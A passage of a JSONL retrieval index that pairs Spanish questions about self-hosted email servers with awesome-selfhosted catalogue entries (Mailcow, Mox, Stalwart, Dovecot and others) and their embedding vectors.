0.01689, -0.02175, 0.03141, 0.03414, -0.06589, 0.01796, -0.05092, -0.07284, -0.04797, 0.11759, 0.0072, -0.00489, 0.09703, -0.12767, -0.02819, -0.02501, -0.06403, -0.01807, -0.0099, 0.03235, 0.03727, -0.02233, 0.00408, -0.08138, -0.03029, -0.03057, 0.00345, -0.03413, -0.04976, -0.0522, -0.05422, -0.03899, 0.00234, -0.04384, -0.07528, -0.04896, 0.01265, -0.0693, 0.04295, -0.04473, 0.11857, 0.0206, -0.00307, 0.11181, -0.03063, -0.03155, -0.00409, 0.05717, -0.10145, -0.00549, -0.02535, 0.04464, 0.00937, 0.04422, 0.01351, -0.0261, 0.04225, 0.05486, 0.0665, -0.00859, -0.00708, 0.01158, 0.04754, -0.02217, 0.00791, 0.01161, 0.01364, 0.01488, -0.04025, -0.03284, -0.04617, 0.07603, 0.08656, -0.06548, -0.02982, -0.03161, -0.04339, -0.11123, -0.04762, -0.05542, -0.0106, -0.04147, 0.03873, 0.03551, 0.02281, 0.00964, -0.0444]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Maddy Mail Server β€” All-in-one mail server that implements SMTP (both MTA and MX) and IMAP. Replaces Postfix, Dovecot, OpenDKIM, OpenSPF, OpenDMARC with single daemon [GPL-3.0, Go]. Mail-in-a-Box β€” Turns any Ubuntu server into a fully functional mail server with one command [CC0-1.0, Shell]. Mailcow β€” Mail server suite based on Dovecot, Postfix and other open source software, that provides a modern Web UI for administration [GPL-3.0, Docker/PHP]. Mailu β€” Simple yet full-featured mail server as a set of Docker images [MIT, Docker/Python]. Modoboa β€” Mail hosting and management platform including a modern and simplified web user interface [ISC, Python]. Mox β€” Complete e-mail solution with IMAP4, SMTP, SPF, DKIM, DMARC, MTA-STS, DANE and DNSSEC, reputation-based and content-based junk filtering, Internationalization (IDNA), automatic TLS with ACME and Let's Encrypt, account autoconfiguration, and webmail [MIT, Go].", "indexar": "que servidor de correo completo puedo montar en un solo comando?", "v": [-0.02865, 0.04609, -0.19425, -0.11794, -0.181, -0.10511, 0.11444, 0.01015, -0.11563, -0.08745, -0.0932, -0.00711, 0.15673, -0.11235, 0.04851, 0.08711, 0.20063, -0.04902, 0.02994, -0.0005, 0.05263, -0.05836, 0.10625, -0.06967, -0.01278, 0.08392, 0.07576, -0.05451, -0.10357, -0.08577, 0.04328, 0.02271, 0.05446, 0.02583, 0.05691, -0.03976, -0.02136, 0.04933, -0.09653, 0.10763, -0.03696, -0.0107, -0.1191, 0.04982, -0.00816, -0.05827, 0.11014, -0.0836, 0.07074, -0.02805, 0.02375, -0.08298, -0.08267, -0.01893, -0.04239, 0.03851, 0.15055, -0.10323, 0.11458, -0.03338, -0.09098, 0.00123, 0.02572, 0.09921, 0.00477, 0.01824, -0.07401, -0.10021, -0.09131, -0.0613, -0.1139, -0.00421, -0.05867, -0.02461, 0.01054, 0.03377, -0.01777, -0.00541, 0.07703, 0.05785, 0.01182, 0.0356, -0.07318, 0.13139, -0.1101, -0.09947, -0.0438, -0.10568, 0.05418, 0.01155, 0.06922, 0.04819, -0.03434, 0.06259, 0.016, -0.01297, 0.05148, 0.05812, 0.02505, 0.03115, 0.01081, 0.05059, -0.04919, 0.14549, 0.0866, 0.10605, 0.10285, -0.05216, 0.06955, 0.00247, -0.00064, -0.05246, -0.02301, 0.01875, -0.08656, -0.15613, -0.02122, -0.01177, 0.01152, 0.00616, -0.1284, 0.06542, 0.08218, 0.12729, 0.04993, -0.08789, 0.04407, 0.01436, 0.05214, -0.00381, -0.04872, 0.01194, -0.01192, -0.08713, 0.0003, 0.08993, 0.01888, -0.01936, -0.09674, -0.07106, -0.00161, 0.0321, -0.02068, -0.01369, 0.08332, 0.02744, 0.06031, -0.14056, -0.04591, 0.02193, 0.07978, 0.07953, -0.03049, 0.0171, -0.05137, -0.03022, 0.03853, -0.05552, 0.0422, 0.05257, 0.02366, 0.05048, -0.03408, 0.09191, 0.01138, -0.02221, -0.02539, 0.00196, 0.00362, 0.02501, -0.06587, 0.0456, 0.04925, -0.00947, 0.02055, -0.0372, -0.02875, -0.03026, -0.0195, 0.05387, -0.01105, 0.03936, -0.03074, -0.0253, -0.0696, -0.01296, 0.01253, 0.00043, 0.01654, 0.0235, 0.01801, 0.0297, -0.03496, 0.04413, 0.01966, -0.02664, -0.00994, 0.01837, -0.04509, -0.04718, -0.02988, -0.00257, -0.02426, -0.03502, -0.01003, -0.08807, -0.04671, 0.09859, 0.01346, 0.03307, 0.01453, -0.02864, 0.07782, -0.05061, -0.0405, -0.01104, 0.07133, -0.04416, -0.03284, -0.00118, -0.0123, 0.01922, 0.03809, -0.00196, 0.02385, 0.01935, -0.0311, -0.0274, 0.07934, 0.03334, -0.03635, 0.03449, -0.02483, -0.01298, 0.04454, -0.00338, 0.04814, -0.01001, -0.02858, -0.0355, 0.022, 0.06021, -0.0202, -0.07269, -0.05059, -0.10526, -0.05793, 0.01314, -0.05842, -0.03518, -0.02523, -0.03186, -0.02331, -0.06325, -0.01155, -0.03739]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Maddy Mail Server β€” All-in-one mail server that implements SMTP (both MTA and MX) and IMAP. Replaces Postfix, Dovecot, OpenDKIM, OpenSPF, OpenDMARC with single daemon [GPL-3.0, Go]. Mail-in-a-Box β€” Turns any Ubuntu server into a fully functional mail server with one command [CC0-1.0, Shell]. Mailcow β€” Mail server suite based on Dovecot, Postfix and other open source software, that provides a modern Web UI for administration [GPL-3.0, Docker/PHP]. Mailu β€” Simple yet full-featured mail server as a set of Docker images [MIT, Docker/Python]. Modoboa β€” Mail hosting and management platform including a modern and simplified web user interface [ISC, Python]. Mox β€” Complete e-mail solution with IMAP4, SMTP, SPF, DKIM, DMARC, MTA-STS, DANE and DNSSEC, reputation-based and content-based junk filtering, Internationalization (IDNA), automatic TLS with ACME and Let's Encrypt, account autoconfiguration, and webmail [MIT, Go].", "indexar": "hay alguna alternativa libre a Postfix y Dovecot que implemente SMTP e IMAP?", "v": [-0.16122, 0.00374, -0.26889, -0.01856, -0.0142, -0.13269, 0.07994, 0.00462, -0.19686, 0.09445, 0.02706, -0.0064, 0.13353, -0.03715, 0.05031, 0.01735, 0.08736, -0.15389, 0.04347, -0.04802, 0.08711, 0.01492, -0.16542, -0.05168, 0.02273, 0.11012, -0.10162, 0.1167, -0.10972, -0.10762, 0.08407, -0.03001, -0.06929, 0.02011, -0.09757, -0.13818, 0.11459, -0.10479, 0.02854, -0.00446, 0.08183, -0.18485, -0.06126, 0.09553, 0.0026, 0.00468, -0.03133, 0.0274, 0.01566, 0.03276, -0.15358, 0.0177, 0.00198, -0.04353, -0.03785, 0.13838, 0.03771, -0.09097, -0.05571, -0.03906, -0.11989, 0.0945, -0.00311, -0.0739, 0.0949, 0.07053, -0.02477, -0.04405, -0.08015, 0.07602, 0.0527, 0.07737, 0.10181, -0.10238, -0.08168, 0.0577, -0.0002, -0.04668, 0.0369, 0.10038, 0.0009, -0.0644, -0.09923, 0.03137, -0.00485, -0.03548, 0.03854, -0.03185, -0.08713, -0.03583, -0.03152, 0.08541, -0.0399, 0.07711, -0.01609, -0.10754, -0.03263, 0.04201, 0.09334, 0.08585, 0.01993, 0.10263, -0.08388, 0.06039, 0.02362, -0.04213, 0.06441, 0.04006, 0.08984, -0.01792, -0.03995, 0.06767, -0.04033, -0.1027, 0.01109, -0.08652, -0.03912, 0.05164, 0.05493, 0.00959, -0.00554, -0.00469, 0.03382, 0.00523, 0.02208, 0.01054, 0.07245, 0.08144, 0.04309, 0.02923, 0.014, 0.01046, -0.0732, -0.11036, -0.02846, 0.03089, 0.04489, 0.02406, 0.06381, -0.00188, 0.00469, 0.01516, -0.01307, -0.02884, 0.01966, -0.03251, -0.02963, -0.10992, -0.04544, 0.00025, 0.01111, -0.02228, 0.00829, 0.03588, 0.07493, 0.0264, -0.00041, 0.00624, -0.03743, 0.04096, -0.07846, -0.03314, -0.03564, 0.03419, -0.04173, 0.02068, -0.04547, -0.05815, -0.00632, 0.00093, 0.02366, 0.074, 0.04819, -0.00619, 0.04277, -0.1052, -0.03945, -0.06625, 0.04698, 0.02095, 0.02411, -0.00387, 0.05235, -0.0072, 0.0126, -0.04581, 0.00788, 0.02501, 0.04893, -0.02956, -0.03739, 0.00128, 0.04075, -0.02967, -0.03434, -0.04357, 0.0068, -0.07449, -0.02274, -0.02044, -0.06169, -0.02278, -0.04646, -0.10523, 0.01233, -0.0111, -0.05856, 0.06325, 0.00677, 0.10567, 0.0451, -0.01741, 0.04126, -0.01048, -0.05471, -0.01913, 0.04942, 0.04227, 0.02091, 0.02072, 0.04525, 0.0005, 0.00985, 0.02272, -0.05361, 0.03307, 0.04666, -0.0171, 0.06048, 0.02213, 0.00725, 0.01943, -0.01483, -0.00919, 0.04134, 0.01039, 0.02351, 0.00418, -0.01354, -0.02153, 0.01704, 0.03108, -0.01926, -0.02861, -0.02338, -0.02523, -0.09467, 0.01534, -0.03355, -0.07326, -0.02533, -0.01208, 0.06233, -0.00556, 0.01295, 0.00485]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Maddy Mail Server β€” All-in-one mail server that implements SMTP (both MTA and MX) and IMAP. Replaces Postfix, Dovecot, OpenDKIM, OpenSPF, OpenDMARC with single daemon [GPL-3.0, Go]. Mail-in-a-Box β€” Turns any Ubuntu server into a fully functional mail server with one command [CC0-1.0, Shell]. Mailcow β€” Mail server suite based on Dovecot, Postfix and other open source software, that provides a modern Web UI for administration [GPL-3.0, Docker/PHP]. Mailu β€” Simple yet full-featured mail server as a set of Docker images [MIT, Docker/Python]. Modoboa β€” Mail hosting and management platform including a modern and simplified web user interface [ISC, Python]. Mox β€” Complete e-mail solution with IMAP4, SMTP, SPF, DKIM, DMARC, MTA-STS, DANE and DNSSEC, reputation-based and content-based junk filtering, Internationalization (IDNA), automatic TLS with ACME and Let's Encrypt, account autoconfiguration, and webmail [MIT, Go].", "indexar": "cuΓ‘l es la soluciΓ³n mΓ‘s sencilla para tener un servidor de correo con interfaz web moderna?", "v": [0.01843, 0.02358, -0.17356, -0.0926, -0.02511, -0.13883, -0.02782, -0.12434, -0.04043, 0.01507, -0.12533, -0.073, 0.06783, -0.08868, 0.11453, -0.00137, 0.16016, -0.09464, 0.03855, -0.02692, 0.0199, -0.00817, -0.04708, -0.08492, -0.11235, 0.0151, 0.04088, -0.03315, -0.06727, -0.07508, 0.00815, -0.122, 0.07023, 0.10247, -0.04069, 0.03944, 0.02534, 0.15768, -0.1057, -0.00616, 0.03748, -0.01277, -0.03299, 0.06239, 0.04285, -0.00048, 0.05116, -0.06147, -0.03733, -0.01142, -0.07844, -0.05622, -0.07413, 0.00597, -0.08319, -0.00965, 0.12172, -0.10132, 0.12147, -0.07705, -0.17631, 0.09865, -0.05756, 0.0161, 0.08133, -0.05805, -0.13567, -0.0227, -0.02666, -0.04576, 0.01098, 0.00961, 0.00829, -0.06534, 0.02557, 0.08845, -0.09496, -0.00565, 0.05169, 0.13681, 0.15517, -0.00427, -0.0655, 0.01318, -0.0668, -0.06176, 0.01848, -0.11231, -0.00303, -0.01902, 0.0926, -0.0066, 0.00698, -0.00727, 0.01725, -0.12577, 0.06011, -0.01829, -0.02487, -0.03704, 0.01687, 0.05703, -0.13113, 0.05813, -0.01976, -0.01901, 0.07666, -0.04046, -0.08053, -0.03975, 0.02284, -0.03043, 0.03357, -0.02972, -0.08267, -0.02285, -0.00758, 0.02074, 0.00451, -0.02173, -0.05008, -0.04137, 0.01609, 0.0732, -0.01535, -0.06586, 0.09338, 0.02662, -0.0229, -0.0316, -0.06966, -0.1407, -0.1153, -0.05867, 0.01108, 0.07125, -0.01309, -0.0823, -0.03215, -0.04703, 0.03365, 0.03605, -0.07364, -0.03891, 0.05074, -0.02833, 0.1103, -0.09245, -0.14253, 0.01781, 0.01667, -0.07026, -0.01327, 0.02332, -0.09376, -0.02181, 0.00238, -0.05539, -0.02344, 0.0522, 0.0019, -0.0295, -0.03927, 0.1013, 0.00726, -0.10637, -0.08606, 0.12224, 0.00396, 0.03394, 0.02716, 0.03708, -0.02229, -0.05913, 0.01835, 0.03831, -0.03083, -0.02373, 0.00281, -0.0049, -0.03896, 0.02656, -0.06706, 0.01282, -0.09372, -0.06776, 0.02937, 0.05527, -0.05266, -0.02422, 0.02804, 0.03072, -0.04114, 0.00502, 0.07355, 0.00827, -0.03275, -0.08421, -0.04724, -0.04413, -0.00599, -0.09395, 0.01366, -0.08763, -0.04397, 0.0796, -0.06792, 0.0107, 0.02466, 0.02277, -0.03416, -0.05556, 0.08954, -0.05325, -0.01161, -0.0339, 0.07139, -0.02755, 0.0476, -0.03126, -0.04053, -0.02918, -0.03642, -0.03986, -0.00635, 0.03747, -0.02693, 0.01569, 0.02669, -0.04274, -0.04063, 0.00658, -0.01657, -0.01369, 0.02292, 0.033, -0.00575, -0.11681, -0.07725, -0.06342, 0.04157, 0.0544, -0.05402, 0.03867, -0.03868, -0.07342, -0.05746, -3e-05, -0.06164, -0.04655, -0.10016, -0.0381, 0.0155, 0.03068, 0.01956, -0.01631]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Postal β€” Complete and fully featured mail server for use by websites & web servers [MIT, Docker/Ruby]. Simple NixOS Mailserver β€” Complete mailserver solution leveraging the Nix Ecosystem [GPL-3.0, Nix]. SimpleLogin β€” Open source email alias solution to protect your email address. Comes with browser extensions and mobile apps [MIT, Docker/Python]. Stalwart Mail Server β€” All-in-one mail server with JMAP, IMAP4, and SMTP support and a wide range of modern features [AGPL-3.0, Rust/Docker]. wildduck β€” Scalable no-SPOF IMAP/POP3 mail server [EUPL-1.2, Nodejs/Docker].", "indexar": "ΒΏquΓ© servidor de correo completo puedo usar para mis pΓ‘ginas web?", "v": [-0.16085, 0.08813, -0.09635, -0.10551, -0.04455, -0.15557, 0.03324, -0.14941, -0.02461, -0.08067, -0.10133, -0.04976, -0.0067, -0.06274, 0.00727, -0.02503, 0.1713, -0.03348, 0.10906, -0.0246, 0.04963, -0.0772, -0.02935, -0.04718, -0.16753, 0.02682, 0.10359, -0.04798, -0.09699, -0.05972, -0.05528, -0.02226, 0.0149, -0.00385, -0.00585, 0.01378, 0.07097, 0.12181, -0.05729, 0.05246, 0.07077, -0.02885, -0.12826, 0.00999, 0.0357, 0.00776, 0.04876, -0.1147, -0.03037, 0.0291, -0.06067, -0.08148, -0.1954, 0.03455, -0.07748, -0.00011, 0.22819, -0.161, 0.11621, -0.0403, -0.10393, 0.04709, 0.02863, -0.00163, -0.00878, -0.10845, -0.11222, -0.00798, -0.06093, -0.00883, -0.03449, 0.06976, 0.05306, -0.0682, 0.06629, 0.03763, -0.04474, 0.01134, 0.04591, 0.08175, 0.05428, 0.04335, -0.09899, 0.06071, -0.13036, -0.06592, -0.00108, -0.02925, 0.07333, -0.07591, 0.09026, 0.0649, -0.09087, -0.02229, -0.05944, -0.1204, -0.00448, -0.03341, 0.01927, -0.0341, 0.06285, 0.05683, 0.00299, 0.03057, 0.01017, 0.05541, 0.04985, -0.01978, 0.03282, -0.04078, 0.00357, -0.05717, -0.1262, -0.03986, -0.09109, -0.02637, 0.03853, 0.01252, 0.05183, -0.04591, -0.09589, 0.02986, -0.00316, 0.07637, 0.07022, -0.01737, 0.08932, 0.02059, -0.05633, -0.04453, -0.04964, -0.07134, -0.1046, -0.05206, 0.02965, 0.02306, 0.03183, -0.05573, -0.03686, -0.03481, 0.03625, -0.02541, -0.11865, 0.01094, 0.07747, -0.00394, 0.02651, -0.04958, -0.15448, -0.03899, 0.03896, -0.05214, 0.0001, 0.00493, -0.04442, -0.06135, 0.04091, -0.06287, -0.00943, -0.01222, -0.00132, 0.05683, 0.07549, 0.11244, 0.0057, -0.00085, -0.06865, 0.02538, 0.00617, 0.06056, 0.00627, 0.07244, 0.03473, -0.08743, 0.05295, -0.05025, -0.09144, 0.01517, 0.0121, 0.03243, -0.01911, -0.00889, -0.01762, 0.01431, -0.05216, -0.00082, 0.05593, -0.04987, -0.00285, 0.02795, -0.00962, 0.0319, -0.04617, 0.03387, 0.04037, -0.00077, -0.03689, -0.04352, 0.00092, -0.0809, -0.01865, -0.05883, -0.0649, 0.01132, 0.00565, -0.01154, -0.05211, 0.003, -0.03626, 0.04505, -0.01249, -0.07614, 0.0775, -0.03707, -0.06035, -0.02196, 0.08593, -0.07185, 0.00177, -0.04029, 0.02466, 0.03932, -0.02281, 0.02961, 0.07547, 0.02343, 0.02372, -0.05794, 0.04635, 0.02364, -0.03415, 0.03911, -0.06261, -0.01827, 0.01141, -0.04412, 0.03689, 0.00799, -0.07694, -0.03492, -0.02299, 0.06098, -0.01513, -0.00455, -0.01026, -0.08048, -0.06628, -0.00476, -0.05614, -0.00175, -0.03876, -0.05677, 0.01731, -0.04435, 0.02845, 0.02985]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Postal β€” Complete and fully featured mail server for use by websites & web servers [MIT, Docker/Ruby]. Simple NixOS Mailserver β€” Complete mailserver solution leveraging the Nix Ecosystem [GPL-3.0, Nix]. SimpleLogin β€” Open source email alias solution to protect your email address. Comes with browser extensions and mobile apps [MIT, Docker/Python]. Stalwart Mail Server β€” All-in-one mail server with JMAP, IMAP4, and SMTP support and a wide range of modern features [AGPL-3.0, Rust/Docker]. wildduck β€” Scalable no-SPOF IMAP/POP3 mail server [EUPL-1.2, Nodejs/Docker].", "indexar": "ΒΏhay alguna alternativa gratuita a Gmail que funcione como un servicio integral?", "v": [-0.12838, 0.08777, -0.08649, -0.0004, 0.01805, -0.19708, -0.12081, -0.00569, -0.08291, -0.10659, 0.05746, -0.07552, 0.06314, 0.08946, 0.15567, -0.03143, 0.10648, -0.07203, -0.04808, -0.00651, -0.12239, 0.12235, -0.01724, -0.15234, -0.11282, -0.00495, 0.00989, -0.09806, -0.02776, 0.01862, 0.16306, -0.15739, -0.01647, -0.19558, -0.16598, 0.02352, 0.03943, 0.07311, 0.03258, -0.02569, 0.0386, -0.07352, -0.0595, 0.12068, -0.15395, -0.06576, 0.02215, 0.07288, 0.01768, -0.00086, -0.15983, -0.03315, -0.04265, -0.00844, -0.0041, 0.1154, 0.0585, -0.18794, -0.08531, -0.10132, -0.0138, 0.0514, 0.1091, 0.12219, 0.00703, -0.0382, -0.04788, -0.03388, -0.10899, 0.08176, -0.02521, 0.01985, -0.05662, -0.00312, -0.04993, 0.02777, -0.02568, -0.00279, -0.04934, 0.14419, 0.09374, -0.05251, 0.03158, -0.04793, -0.08916, -0.09347, 0.03613, -0.07316, -0.00631, -0.01656, 0.04177, 0.05954, -0.06004, 0.1899, -0.04064, 0.00317, 0.02973, -0.13518, -0.00827, 0.01349, 0.17471, -0.00377, -0.04703, 0.09747, -0.05956, 0.02256, -0.01358, -0.02435, 0.02225, -0.01004, -0.03649, -0.03291, 0.02778, -0.01254, -0.06176, -0.06239, -0.03591, -0.05637, 0.00164, 0.06009, -0.04927, -0.00287, -0.0467, 0.01745, 0.01463, -0.00056, -0.01335, 0.04331, 0.01286, 0.06339, 0.01056, -0.05564, -0.06077, -0.03717, -0.06868, 0.01005, 0.01151, -0.02849, -0.00425, -0.01346, 0.06348, 0.02572, 0.06539, -0.03988, -0.00763, -0.00675, 0.05419, -0.05336, -0.06176, -0.07044, -0.03095, 0.0077, -0.01734, 0.09077, -0.05306, -0.00252, -0.02641, -0.10395, -0.00228, 0.07459, -0.01486, -0.05857, 0.00594, 0.06623, -0.03804, -0.05137, 0.01475, -0.01171, -0.06377, 0.06257, -0.03777, 0.01101, -0.03282, -0.06903, 0.00841, 0.00876, 0.04258, 0.02706, 0.0811, 0.02093, 0.00335, 0.01352, -0.02329, 0.00079, -0.03754, -0.02477, -0.07338, -0.00925, -0.00686, 0.02759, -0.00098, -0.00144, -0.03306, -0.01861, -0.04216, -0.03191, -0.05998, -0.10633, -0.07453, -0.00402, -0.07251, -0.03921, 0.04853, 0.02903, 0.00475, -0.00681, 0.00078, 0.05503, -0.01176, 0.01595, -0.01723, 0.00526, 0.03817, -0.02416, -0.01244, 0.01069, 0.04363, -0.04253, 0.02416, 0.00908, 0.00498, -0.02747, -0.00267, -0.01071, 0.02741, 0.01885, 0.03739, 0.05417, -0.02487, 0.05446, 0.04861, 0.05334, -0.02944, -0.019, 0.04369, -0.03489, 0.05076, -0.01324, 0.00453, -0.05321, 0.0401, 0.05289, -0.01159, 0.04689, -0.03995, -0.00335, -0.04244, 0.02222, -0.00359, -0.02123, -0.01333, 0.04053, -0.01133, 0.00423, 0.05585, -0.03085]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Postal β€” Complete and fully featured mail server for use by websites & web servers [MIT, Docker/Ruby]. Simple NixOS Mailserver β€” Complete mailserver solution leveraging the Nix Ecosystem [GPL-3.0, Nix]. SimpleLogin β€” Open source email alias solution to protect your email address. Comes with browser extensions and mobile apps [MIT, Docker/Python]. Stalwart Mail Server β€” All-in-one mail server with JMAP, IMAP4, and SMTP support and a wide range of modern features [AGPL-3.0, Rust/Docker]. wildduck β€” Scalable no-SPOF IMAP/POP3 mail server [EUPL-1.2, Nodejs/Docker].", "indexar": "con quΓ© programa puedo montar mi propio servicio de correo sin puntos ΓΊnicos de fallo?", "v": [-0.06135, 0.14546, -0.19286, -0.02642, -0.15629, -0.04897, 0.05565, -0.05701, -0.25481, -0.1164, -0.01822, -0.01223, 0.10394, -0.02744, 0.04482, 0.02193, 0.09609, -0.0466, 0.08788, -0.0039, -0.0534, -0.16211, -0.00559, -0.14652, -0.0509, 0.06966, 0.07708, -0.04532, -0.06712, -0.04699, 0.14997, 0.01198, 0.07306, -0.08637, 0.05045, -0.05072, 0.05997, 0.11298, 0.04896, 0.06833, 0.01444, -0.08118, -0.0082, 0.05611, 0.01337, -0.11275, 0.09452, -0.01913, -0.03155, -0.03395, 0.10077, -0.12101, -0.04298, -0.08873, -0.01011, -0.06274, 0.04278, -0.0152, 0.00149, -0.02614, -0.05851, 0.02502, 0.04232, 0.00997, 0.06532, -0.03771, 0.01714, -0.01569, -0.05459, 0.0049, -0.06798, -0.08848, 0.07154, -0.07622, -0.03017, 0.09921, -0.03177, -0.06718, 0.07833, -0.00727, 0.00261, -0.05365, -0.07018, -0.0119, -0.02821, -0.03092, 0.01224, -0.05671, -0.08033, -0.05218, 0.05601, 0.0626, 0.07521, 0.08156, -0.06291, -0.10707, 0.09426, 0.04643, 0.00391, 0.03513, 0.03695, -0.01659, -0.06039, 0.18111, 0.02003, 0.05664, 0.08749, 0.03594, -0.00992, 0.04689, -0.01846, 0.00676, -0.03975, -0.05458, -0.09048, -0.10373, -0.08601, -0.06813, 0.02082, -0.02314, -0.04688, 0.02627, 0.14723, -0.01385, 0.03208, -0.07731, 0.0306, 0.10718, 0.02971, 0.07251, 0.00754, 0.07342, -0.0551, -0.09486, 0.03928, -0.04068, -0.0315, 0.01033, -0.04045, 0.01126, 0.06373, -0.01495, -0.0309, -0.01181, 0.07477, -0.00333, -0.04738, -0.12665, -0.0588, -0.0378, -0.05508, 0.06935, -0.01271, 0.01229, -0.09275, -0.04211, 0.04041, -0.04208, 0.04921, 0.06754, -0.06171, 0.00861, 0.02456, 0.04516, 0.07432, -0.00595, 0.0029, 0.05263, 0.08241, 0.06189, -0.11404, 0.11731, -0.01222, -0.06856, 0.03161, -0.01571, -0.08714, -0.033, 0.02427, 0.01938, -0.06212, 0.03459, 0.08101, 0.00967, -0.11269, 0.01698, -0.02331, 0.0549, 0.10765, 0.03506, -0.0225, -0.02841, 3e-05, 0.02839, -0.01213, -0.00759, -0.02818, -0.02344, 0.02656, -0.05881, -0.06386, 0.01537, 0.00699, 0.02531, 0.00849, 0.03786, -0.04087, 0.06201, 0.03827, 0.13484, 0.01756, -0.05104, 0.05363, -0.05581, -0.03244, -0.02618, 0.04225, 0.0215, -0.01129, 0.0607, 0.00922, -0.01999, 0.01116, 0.03062, 0.0077, -0.01852, 0.03754, 0.01814, 0.05602, 0.06105, 0.01401, -0.04433, -0.03615, -0.05116, 0.06736, 0.00447, 0.05953, -0.0213, -0.01748, -0.04486, 0.04009, 0.0838, 0.00408, -0.04076, 0.00323, -0.00031, -0.04856, 0.01107, -0.03042, 0.01897, -0.07786, -0.02881, 0.02169, -0.08326, 0.03311, 0.00928]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Delivery Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Delivery Agents", "tema": "communication - email - mail delivery agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Delivery Agents: Cyrus IMAP β€” Email (IMAP/POP3), contacts and calendar server [BSD-3-Clause-Attribution, C]. DavMail β€” POP/IMAP/SMTP/Caldav/Carddav/LDAP exchange gateway allowing users to use any mail/calendar client with an Exchange server, even from the internet or behind a firewall through Outlook Web Access [⚠, GPL-2.0, Java]. Dovecot β€” IMAP and POP3 server written primarily with security in mind [MIT/LGPL-2.1, C/deb].", "indexar": "que programa puedo usar para entregar y gestionar correos electronicos?", "v": [0.03396, 0.07775, -0.12958, -0.16831, 0.07206, -0.02831, 0.08959, 0.01548, -0.1484, -0.13514, -0.13903, -0.05887, 0.10827, -0.08816, 0.03575, -0.03086, 0.18794, 0.05106, -0.01953, -0.00315, 0.01892, 0.06415, -0.12027, -0.09855, -0.06913, 0.0981, -0.01012, -0.02957, 0.04846, 0.1151, 0.07067, -0.04121, 0.03105, -0.12032, 0.07795, 0.1104, 0.05313, 0.09764, 0.01385, 0.00773, 0.09383, 0.04843, -0.11789, -0.02562, 0.05135, -0.09166, 0.09708, -0.00712, -0.00791, -0.02431, -0.0508, -0.07933, -0.13136, -0.03605, 0.01253, -0.06157, 0.10074, -0.16719, 0.05038, -0.05733, 0.04908, 0.08808, 0.10785, 0.08777, -0.00776, -0.00964, 0.0863, -0.05075, -0.22852, 0.02193, 0.02024, 0.03679, 0.00528, 0.00254, 0.00141, 0.00987, -0.05414, 0.00189, -0.01839, 0.07095, 0.01363, -0.07518, 0.0266, 0.04264, -0.068, -0.092, 0.00945, -0.07207, -0.05615, -0.10623, 0.00551, -0.00451, -0.06473, -0.00718, 0.00136, 0.02033, -0.07397, -0.01007, -0.03894, 0.10489, 0.01364, 0.0333, -0.0918, 0.1156, -0.13575, 0.08593, 0.03477, -0.02233, 0.10168, 0.02166, -0.1368, -0.02916, -0.01546, -0.01411, -0.09044, 0.00986, 0.03052, -0.0953, 0.05741, -0.0506, -0.0746, 0.04034, 0.04043, 0.05927, 0.17379, -0.06429, 0.0041, 0.04012, -0.02649, 0.11911, -0.0883, -0.06581, -0.00666, -0.0176, -0.06649, -0.0283, -0.04833, -0.03703, -0.01901, -0.04589, -0.01164, 0.09449, -0.0217, -0.03662, 0.0238, -0.0188, -0.02459, -0.07401, -0.08235, -0.00141, 0.05039, -0.05814, -0.01636, 0.02148, -0.05101, -0.00903, 0.068, -0.08107, -0.07357, -0.00191, -0.04864, 0.0349, -0.01648, 0.06958, 0.00605, -0.07974, 0.01662, 0.09117, -0.05456, 0.09348, -0.02032, 0.06495, 0.02165, -0.01535, -0.00654, -0.05711, 0.01382, 0.00443, 0.00297, 0.04093, -0.07487, 0.10561, 0.03277, 0.0254, -0.06172, 0.01324, -0.05745, 0.05352, -0.00273, 0.04563, -0.00709, 0.03934, 0.02332, 0.04502, 0.01539, 0.00996, -0.04684, -0.03288, -0.03847, -0.02545, -0.02423, 0.0222, -0.01759, -0.00255, 0.0146, 0.04024, -0.07504, 0.03179, 0.04191, 0.07966, 0.00592, -0.05879, 0.02599, -0.02281, -0.0624, 0.00517, -0.01215, 0.0273, 0.01438, 0.03233, -0.02488, -0.00241, 0.02141, 0.01219, 0.00491, -0.02323, 0.04696, 0.04574, -0.00384, 0.0334, -0.01988, 0.03738, -0.01591, 0.00437, 0.02761, -0.00835, 0.05105, -0.06298, -0.01517, -0.05102, -0.0014, 0.07944, -0.01172, 0.00068, -0.02568, -0.02189, 